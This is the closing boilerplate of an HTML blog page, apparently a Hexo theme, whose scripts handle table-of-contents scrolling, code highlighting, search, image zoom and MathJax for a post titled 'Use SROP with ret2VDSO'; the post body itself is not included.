      var navHeight = $('#navbar').height();
      var toc = $('#toc');
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;
      var tocLimMax = 2 * boardTop + boardCtn.height();

      $(window).scroll(function () {
        var tocLimMin = $('#toc-start').offset().top - navHeight;
        var scroH = document.body.scrollTop + document.documentElement.scrollTop;

        if (tocLimMin <= scroH && scroH <= tocLimMax) {
          toc.css({
            'display': 'block',
            'position': 'fixed',
            'top': navHeight,
          });
        } else if (scroH <= tocLimMin) {
          toc.css({
            'position': '',
            'top': '',
          });
        } else if (scroH > tocLimMax) {
          toc.css('display', 'none');
        }
      });
      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc > p').css('visibility', 'visible');
      }
      var offset = boardCtn.css('margin-right')
      $('#toc-ctn').css({
        'right': offset
      })
    });
  </script>







  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




<!-- Plugins -->



  <script src="https://cdn.staticfile.org/prettify/188.0.0/prettify.min.js"></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>



  <script src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js"></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "Use SROP with ret2VDSO&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js"></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script src="/js/local-search.js"></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script defer src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js"></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>



  

  
    <!-- MathJax -->
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
          tex2jax: {
              inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
              processEscapes: true,
              skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
          }
      });

      MathJax.Hub.Queue(function() {
          var all = MathJax.Hub.getAllJax(), i;
          for(i=0; i < all.length; i += 1) {
              all[i].SourceElement().parentNode.className += ' has-jax';
          }
      });

    </script>

    <script src="https://cdn.staticfile.org/mathjax/2.7.7/MathJax.js?config=TeX-MML-AM_CHTML"></script><!-- hexo-inject:begin --><!-- Begin: Injected MathJax -->
<script type="text/x-mathjax-config">
  MathJax.Hub.Config("");
</script>

<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
      all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>

<script type="text/javascript" src="custom_mathjax_source">
</script>
<!-- End: Injected MathJax -->
<!-- hexo-inject:end -->

  










</body>
</html>
